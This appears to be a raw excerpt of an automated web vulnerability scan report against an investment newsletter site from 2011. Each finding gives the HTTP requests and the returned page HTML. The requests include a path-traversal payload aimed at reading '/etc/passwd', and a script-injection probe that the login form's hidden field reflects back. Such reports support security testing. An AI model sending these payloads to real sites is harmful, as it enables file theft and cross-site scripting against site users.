</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 21399
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>True Wealth Alliance Lifetime Investment Research Report</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The True Wealth Alliance investment research service is a lifetime subsription program written by Dr. Steve Sjuggerud.">
<meta name="keywords" content="investment newsletter, stock investment newsletter, investment newsletters, investing newsletter, stock newsletter, investing advice, stock research, stock analysis, investment research">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/sug";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/'"--></style></script><script>netsparker(0x003B57)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/sug_title_sm.gif" alt="True Wealth Alliance"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">The True Wealth Alliance is currently closed to new members. Please contact our director of sales Michael Cottet at 888-863-9356 to learn more about other Stansberry &amp; Associates services and offers.</font></p>
</td>
..
- /pub/pal/

/pub/pal/ CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/index.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/pal/?nsextt=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/pal
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12152
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/nsextt=%20netsparker(0x003B13)%20">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23341
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The S&A Alliance Lifetime Investment Research Report</title>
<meta name="description" content="The S&A Alliance is a lifetime investment research program that provides insight into several broad investment strategies.">
<meta name="keywords" content="investment newsletter, stock investment research, investment newsletters, stock newsletter, investing newsletter, investment research newsletter, market research, investment advice, investment advisor">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/pal";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

